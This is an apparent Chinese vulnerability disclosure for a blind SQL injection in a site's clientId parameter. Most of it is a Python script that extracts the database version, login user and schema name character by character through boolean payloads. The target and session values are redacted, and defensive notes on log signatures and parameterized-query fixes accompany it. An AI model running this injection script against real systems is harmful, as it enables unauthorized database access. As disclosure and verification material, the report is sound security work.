【高危】XX某站SQL注入
时间:2021-07-01 10:21:17
#! /usr/bin/env python3
# Date : 1/5 16:04
# Comment: no comment


import requests

# Target URL, redacted to a placeholder by the author. None of the functions
# in this listing read raw_url; each one builds its own request URL.
raw_url = xxx
# Cookies and headers sent with every verification request; both were
# redacted by the author, so the real session values are not on the page.
burp0_cookies = {xxx}
burp0_headers = {xxx}
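def get_version():
    """Verify the reported boolean-based blind SQL injection by reading version().

    For every character position 1..19 and every printable ASCII code
    32..126, one GET is sent to /check with the clientId value followed by
    ``or ascii(mid(version(), i, 1)) = j``. When the response body contains
    "true", chr(j) is appended to the result and the next position is tried.
    Every URL and the final string are printed; nothing is returned.

    Review notes:
      * A response that changes with the injected condition shows that
        clientId is concatenated into the SQL statement. The fix is to pass
        it as a bound parameter of a prepared statement.
      * One run is at most 19 * 95 = 1805 sequential GETs to /check, each
        carrying ``ascii(mid(`` and ``/**/`` in clientId, which is the
        pattern to search for in access or WAF logs.
      * version()/mid()/ascii() look like MySQL functions; the page does not
        name the DBMS.
    """
    version = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = (
                "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(version(),"
                + str(i) + ",1))=" + str(j)
            )
            # Call form of print: the shebang asks for python3, where the
            # original statement form ``print burp0_url`` is a SyntaxError.
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception:
                # Best effort, as in the original: a failed request skips this
                # candidate, so a network error can leave a gap in the result.
                continue
            # Substring match on the whole body. If "true" appears in every
            # response, each position would match at code 32, so the result
            # should be compared with a condition known to be false.
            if "true" in res.text:
                version += chr(j)
                break
    print('version:', version)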
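def get_user():
    """Verify the reported boolean-based blind SQL injection by reading user().

    For every character position 1..19 and every printable ASCII code
    32..126, one GET is sent to /check with the clientId value followed by
    ``or ascii(mid(user(), i, 1)) = j``. When the response body contains
    "true", chr(j) is appended to the result and the next position is tried.
    Every URL and the final string are printed; nothing is returned.

    Review notes:
      * The account name returned by user() tells the defender which database
        login the application uses; a privileged account widens the impact of
        the injection, so the application login should be least-privilege.
      * The fix for the injection itself is to pass clientId as a bound
        parameter of a prepared statement.
      * One run is at most 19 * 95 = 1805 sequential GETs to /check, each
        carrying ``ascii(mid(`` and ``/**/`` in clientId.
    """
    user = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = (
                "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(user(),"
                + str(i) + ",1))=" + str(j)
            )
            # Call form of print: the shebang asks for python3, where the
            # original statement form ``print burp0_url`` is a SyntaxError.
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception:
                # Best effort, as in the original: a failed request skips this
                # candidate, so a network error can leave a gap in the result.
                continue
            # Substring match on the whole body; a page that always contains
            # "true" would make every position match at code 32.
            if "true" in res.text:
                user += chr(j)
                break
    print('user:', user)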
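def get_db():
    """Verify the reported boolean-based blind SQL injection by reading database().

    For every character position 1..19 and every printable ASCII code
    32..126, one GET is sent to /check with the clientId value followed by
    ``or ascii(mid(database(), i, 1)) = j``. When the response body contains
    "true", chr(j) is appended to the result and the next position is tried.
    Every URL and the final string are printed; nothing is returned.

    Review notes:
      * Only positions 1..19 are probed, so a longer schema name is printed
        truncated; the output proves the injection and is not a full read.
      * The fix is to pass clientId as a bound parameter of a prepared
        statement instead of concatenating it into the query.
      * One run is at most 19 * 95 = 1805 sequential GETs to /check, each
        carrying ``ascii(mid(`` and ``/**/`` in clientId.
    """
    current_db = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = (
                "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(database(),"
                + str(i) + ",1))=" + str(j)
            )
            # Call form of print: the shebang asks for python3, where the
            # original statement form ``print burp0_url`` is a SyntaxError.
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception:
                # Best effort, as in the original: a failed request skips this
                # candidate, so a network error can leave a gap in the result.
                continue
            # Substring match on the whole body; a page that always contains
            # "true" would make every position match at code 32.
            if "true" in res.text:
                current_db += chr(j)
                break
    print('current_db:', current_db)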
# Run the three checks in the order the author used: version, database, user.
for check in (get_version, get_db, get_user):
    check()
有时扫描器先报出了注入点,但 sqlmap 跑不出来、无法验证,而漏洞又确实存在;这种情况下可以自己写脚本来验证,这也算是一种思路。确认存在后,修复方法是让 clientId 通过参数化查询(预编译语句)传入,而不是拼接进 SQL 语句。